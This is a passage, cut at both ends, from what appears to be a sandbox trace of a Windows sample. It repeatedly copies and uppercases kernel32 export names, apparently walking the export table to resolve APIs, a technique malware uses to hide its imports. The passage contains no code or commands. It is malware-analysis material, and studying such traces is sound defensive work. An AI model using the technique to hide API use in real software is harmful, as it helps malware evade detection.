lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.460] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.460] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.460] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.460] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.461] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.461] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.461] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.461] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.461] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.461] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.461] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.461] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.461] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.461] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.461] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.461] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.461] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.461] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.461] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.461] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.461] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.461] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.461] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.461] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.462] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.462] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.462] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.462] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.462] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.462] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.462] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.462] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.462] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.462] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.462] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.462] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.462] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.462] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.462] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.462] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.462] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.462] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.462] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.463] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.463] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.463] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.463] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.463] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.463] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.463] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.463] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.463] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.463] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.463] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.463] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.463] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.463] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.463] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.463] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.463] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.463] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.463] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.463] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.464] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.464] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.464] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.464] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.464] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.464] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.464] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.464] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.464] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.464] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.464] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.464] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.464] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0077.464] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0077.464] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0077.465] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0077.465] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0077.465] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0077.465] lstrlenA (lpString="CTRLROUTINE") returned 11 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0077.465] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0077.465] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0077.465] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0077.465] lstrlenA (lpString="DEBUGBREAK") returned 10 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0077.465] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0077.465] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0077.465] lstrlenA (lpString="DECODEPOINTER") returned 13 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0077.465] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0077.465] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0077.465] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0077.465] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0077.465] lstrlenA (lpString="DELETEATOM") returned 10 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0077.465] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0077.465] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0077.465] lstrlenA (lpString="DELETEFIBER") returned 11 [0077.465] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0077.466] lstrlenA (lpString="DELETEFILEA") returned 11 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0077.466] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0077.466] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0077.466] lstrlenA (lpString="DELETEFILEW") returned 11 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0077.466] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0077.466] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0077.466] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0077.466] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0077.466] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0077.466] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0077.466] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0077.466] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0077.466] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0077.466] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0077.466] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0077.466] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0077.466] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0077.466] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0077.466] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0077.467] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0077.467] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0077.467] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0077.467] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0077.467] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0077.467] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0077.467] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0077.467] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0077.467] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0077.467] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0077.467] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0077.467] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0077.467] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0077.467] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0077.467] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0077.467] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0077.467] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: 